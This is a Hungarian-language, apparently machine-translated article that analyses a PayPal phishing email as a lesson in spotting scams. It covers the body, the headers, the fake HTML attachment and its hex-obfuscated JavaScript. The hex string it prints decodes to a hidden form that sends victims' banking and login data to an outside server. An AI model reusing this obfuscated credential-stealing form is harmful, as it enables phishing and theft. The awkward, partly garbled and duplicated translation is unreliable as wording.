Online biztonság: az adathalász e-mail anatómiájának lebontása

Tartalomjegyzék:

Online biztonság: az adathalász e-mail anatómiájának lebontása
Online biztonság: az adathalász e-mail anatómiájának lebontása

Videó: Online biztonság: az adathalász e-mail anatómiájának lebontása

Videó: Online biztonság: az adathalász e-mail anatómiájának lebontása
Videó: Booting from the network with PXE - YouTube 2024, Április
Anonim
 A mai világban, ahol mindenki információ van online, az adathalászat az egyik legnépszerűbb és pusztító online támadás, mert mindig meg tudja tisztítani a vírust, de ha bankadatait ellopták, bajban vagy. Itt van egy ilyen támadás megtörése.
A mai világban, ahol mindenki információ van online, az adathalászat az egyik legnépszerűbb és pusztító online támadás, mert mindig meg tudja tisztítani a vírust, de ha bankadatait ellopták, bajban vagy. Itt van egy ilyen támadás megtörése.

Ne gondold, hogy csak a bankadatok fontosak: végül is, ha valaki átveszi a fiókbejelentkezés feletti ellenőrzést, akkor nem csak az adott fiókban szereplő információkat ismeri fel, hanem az esély, hogy ugyanazt a bejelentkezési információt különböző más fiókok. És ha kompromisszák az e-mail fiókját, akkor visszaállíthatja az összes többi jelszót.

Tehát az erős és változó jelszavak mellett mindig figyelni kell a hamis e-maileket, amelyek az igazi maszkolást jelentik. Miközben a legtöbb adathalász kísérlet amatőr, egyesek meglehetősen meggyőzőek, ezért fontos megérteni, hogyan ismerjék fel őket a felszíni szinten, és hogyan működnek a motorháztető alatt.

Kép: asirap

Megvizsgálva, mi a Plain Sight

Példánkban az e-mail, mint a legtöbb adathalász kísérlet, "értesíti" Önt a PayPal-fiókjában végzett tevékenységről, amely normális körülmények között riasztó lehet. Tehát a cselekvésre való felhívás a fiókod ellenőrzése / visszaállítása azzal, hogy csaknem minden olyan személyes adatot nyújt be, amelyet gondolhat. Ismét ez eléggé formális.

Bár biztosan vannak kivételek, bár minden adathalász és átveréses e-mailt piros zászlók töltenek közvetlenül az üzenetben. Még ha a szöveg is meggyőző, általában sok hibát találsz az üzenetek testében, amelyek azt jelzik, hogy az üzenet nem törvényes.

Az üzenet teste

Első pillantásra ez az egyik legjobb adathalász e-mail, amelyet láttam. Nincsenek helyesírási vagy nyelvtani hibák, és a szóbeli olvasás az Ön elvárásainak megfelelően olvasható. Vannak azonban még néhány piros zászló is, amelyet egy kicsit közelebbről megvizsgál.
Első pillantásra ez az egyik legjobb adathalász e-mail, amelyet láttam. Nincsenek helyesírási vagy nyelvtani hibák, és a szóbeli olvasás az Ön elvárásainak megfelelően olvasható. Vannak azonban még néhány piros zászló is, amelyet egy kicsit közelebbről megvizsgál.
  • "Paypal" - A helyes eset a "PayPal" (tőke P). Láthatja, hogy mindkét változat az üzenetben szerepel. A vállalatok nagyon szándékosak a brandingjükkel, így kétséges, hogy valami ilyesmi áthaladna a korrigáló folyamaton.
  • "Engedélyezze az ActiveX-t" - Hányszor láttál egy PayPal méretű, legális web alapú vállalkozást egy olyan tulajdonosi összetevővel, amely csak egyetlen böngészőn működik, különösen akkor, ha több böngészőt támogat? Persze, valahol ott van egy cég, de ez egy piros zászló.
  • "Biztonságosan". - Figyeld meg, hogy ez a szó nem illeszkedik a margóhoz a bekezdés szövegének többi részével. Még akkor is, ha egy kicsit többet nyúlok ki az ablakhoz, nem tér el helyesen.
  • "Paypal!" - A felkiáltójel előtt álló tér kellemetlennek tűnik. Csak egy újabb meglepetés, amelyről biztos vagyok benne, hogy nem lenne egy legitim e-mail.
  • "PayPal - Számla frissítése Form.pdf.htm" - Miért kellene a Paypal csatolni egy "PDF-t", különösen akkor, ha csak egy oldalra mutató linket tudtak elhelyezni a webhelyükön? Továbbá, miért próbálják elrejteni a HTML-fájlt PDF formátumban? Ez a legnagyobb piros zászló.

Az üzenet fejléce

Ha megnézed az üzenet fejlécét, még néhány piros zászló jelenik meg:
Ha megnézed az üzenet fejlécét, még néhány piros zászló jelenik meg:
  • A címről a következő cím: [email protected].
  • A címzés hiányzik. Nem üresítettem ki, egyszerűen nem része a standard üzenet fejlécnek. Általában egy olyan cég, amely a nevedet személyre szabja az e-mailt.

A csatolmány

Amikor megnyitom a mellékletet, azonnal láthatod, hogy az elrendezés nem megfelelő, mert hiányzik a stílusadatok. Ismét miért küldi el a PayPal HTML formanyomtatványt, amikor csak egy linket adhatnak hozzá a webhelyükön?

Jegyzet: a Gmail beépített HTML csatolmánymegtekintőjét használtuk erre a célra, de javasolnánk, hogy ne nyissa meg a csalásokkal kapcsolatos mellékleteket. Soha. Valaha. Gyakran tartalmaznak olyan kizsákmányolókat, amelyek trojansokat telepítenek a számítógépére, hogy ellopják a fiókadatait.

Image
Image

Egy kicsit többet görgetve láthatjuk, hogy ez az űrlap nem csak a PayPal bejelentkezési adatait, hanem banki és hitelkártya adatait is megkérdezi. Néhány kép törött.

Nyilvánvaló, hogy ez az adathalászkodási kísérlet mindent egy újabb dolog után követ.
Nyilvánvaló, hogy ez az adathalászkodási kísérlet mindent egy újabb dolog után követ.

A technikai bontás

Bár egyértelműnek kell lennie, mivel látható, hogy ez egy adathalászati kísérlet, most megpróbáljuk lebontani az e-mail technikai összetételét és megnézni, mit találhatunk.

Információ a csatolótól

Az első dolog, hogy vessen egy pillantást a HTML forrása a csatolt űrlap, ami az adatokat benyújtja a hamis oldalon.

A forrás gyors megtekintésénél minden hivatkozás érvényesnek mutatkozik, amelyek a "paypal.com" vagy a "paypalobjects.com" kifejezésre utalnak, amelyek mindegyike legitim.

Most megnézzük azokat az alapinformációs információkat, amelyeket a Firefox gyűjti össze az oldalon.
Most megnézzük azokat az alapinformációs információkat, amelyeket a Firefox gyűjti össze az oldalon.
Mint láthatja, a grafikák egy része a legit PayPal domainek helyett a "blessedtobe.com", a "goodhealthpharmacy.com" és a "pic-upload.de" domainekből húzódik.
Mint láthatja, a grafikák egy része a legit PayPal domainek helyett a "blessedtobe.com", a "goodhealthpharmacy.com" és a "pic-upload.de" domainekből húzódik.
Image
Image

Az e-mail fejlécek adatai

Ezután megnézzük a nyers email üzenet fejléceket. A Gmail ezt az üzenet Eredeti menüpontján keresztül jeleníti meg.

Az eredeti üzenet fejlécére vonatkozó információkat megtekintve láthatjuk, hogy ez az üzenet az Outlook Express 6 alkalmazásával készült. Kétlem, hogy a PayPal rendelkezik személyzettel a személyzettel, amely az üzeneteket kézzel küldte el egy elavult e-mail kliensen keresztül.
Az eredeti üzenet fejlécére vonatkozó információkat megtekintve láthatjuk, hogy ez az üzenet az Outlook Express 6 alkalmazásával készült. Kétlem, hogy a PayPal rendelkezik személyzettel a személyzettel, amely az üzeneteket kézzel küldte el egy elavult e-mail kliensen keresztül.
Most pedig az útválasztási információra tekintünk, láthatjuk mind a küldő, mind a továbbító levélkiszolgáló IP-címét.
Most pedig az útválasztási információra tekintünk, láthatjuk mind a küldő, mind a továbbító levélkiszolgáló IP-címét.
A "Felhasználó" IP-cím az eredeti feladó. Az IP-adatok gyors lekérdezésére láthatjuk, hogy a küldő IP-cím Németországban van.
A "Felhasználó" IP-cím az eredeti feladó. Az IP-adatok gyors lekérdezésére láthatjuk, hogy a küldő IP-cím Németországban van.
És amikor megnézzük az átküldő levelező kiszolgáló (mail.itak.at) IP-címét látjuk, ez egy Ausztriában működő internetszolgáltató. Kétlem, hogy a PayPal az e-maileket közvetlenül egy osztrák internetszolgáltatón keresztül irányítja, amikor egy hatalmas szervergazdasággal rendelkezik, amely könnyen kezelheti ezt a feladatot.
És amikor megnézzük az átküldő levelező kiszolgáló (mail.itak.at) IP-címét látjuk, ez egy Ausztriában működő internetszolgáltató. Kétlem, hogy a PayPal az e-maileket közvetlenül egy osztrák internetszolgáltatón keresztül irányítja, amikor egy hatalmas szervergazdasággal rendelkezik, amely könnyen kezelheti ezt a feladatot.
Image
Image

Hol halad az adatok?

Tehát egyértelműen meghatároztuk, hogy ez egy adathalász e-mail, és összegyűjtött néhány információt arról, hogy honnan származik az üzenet, de mi van az adatok küldésével?

Ehhez először el kell menteni a HTM mellékletet az asztalunkon, és meg kell nyitni egy szövegszerkesztőben. Görgetés közben minden úgy tűnik, hogy rendben van, kivéve, ha egy gyanús kereső Javascript blokkhoz jutunk.

Kihúzva a Javascript utolsó blokkjának teljes forrását, látjuk:
Kihúzva a Javascript utolsó blokkjának teljes forrását, látjuk:

Ha bármikor látsz egy nagyszerű, véletlenszerû betûket és számokat tartalmazó Java-kódot, amely egy JavaScript blokkba ágyazódik, akkor általában valami gyanús. A kódot nézve az "x" változó erre a nagy karakterláncra van állítva, majd dekódolva az "y" változóra. Az "y" változó végeredményét a dokumentumba HTML formában írjuk.

Mivel a nagy karakterlánc a 0-9 számokból és az a-f betűkből áll, valószínűleg egy egyszerű ASCII-Hex átalakításon keresztül kódolják:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Fordít:

Nem véletlen, hogy ez egy érvényes HTML formátumú címkévé alakul, amely az eredményeket nem a PayPal felé továbbítja, hanem a gazember számára.

Továbbá, ha megtekinti az űrlap HTML forrását, látni fogja, hogy ez a űrlapcímke nem látható, mert dinamikusan jelenik meg a Javascript segítségével. Ez egy okos módszer arra, hogy elrejtse, mit csinál a HTML, ha valaki egyszerűen megtekinti a létrehozott forrást (mint korábban tettük), szemben azzal, hogy a melléklet közvetlenül a szövegszerkesztőben nyílik meg.

Ha egy gyors whois-t futtatsz a sértő webhelyen, láthatjuk, hogy ez egy olyan domain, amelyet egy népszerű internetes fogadó host, 1and1.
Ha egy gyors whois-t futtatsz a sértő webhelyen, láthatjuk, hogy ez egy olyan domain, amelyet egy népszerű internetes fogadó host, 1and1.
Ami kiemelkedik, a domain egy olvasható nevet használ (ellentétben valami hasonló "dfh3sjhskjhw.net"), és a domain már 4 évig regisztrált. Emiatt úgy gondolom, hogy ezt a domain-t elfogták és használják zálogként ebben az adathalászati kísérletben.
Ami kiemelkedik, a domain egy olvasható nevet használ (ellentétben valami hasonló "dfh3sjhskjhw.net"), és a domain már 4 évig regisztrált. Emiatt úgy gondolom, hogy ezt a domain-t elfogták és használják zálogként ebben az adathalászati kísérletben.

A cinizmus jó védelem

Amikor online biztonságban kell maradnia, soha nem fáj a jó cinizmusnak.

Bár biztos vagyok benne, hogy a piros zászlók vannak a példapéldányban, a fent említettek olyan mutatók, amelyeket csak néhány perc után vizsgáltunk. Hipotetikusan, ha az e-mail felületi szintje 100% -os legitim ellentételezését utánozta, akkor a technikai elemzés még mindig felmutatná valódi természetét. Ezért importálható, hogy megvizsgálhassa mindazt, amit tudsz és nem láthatsz.

Ajánlott: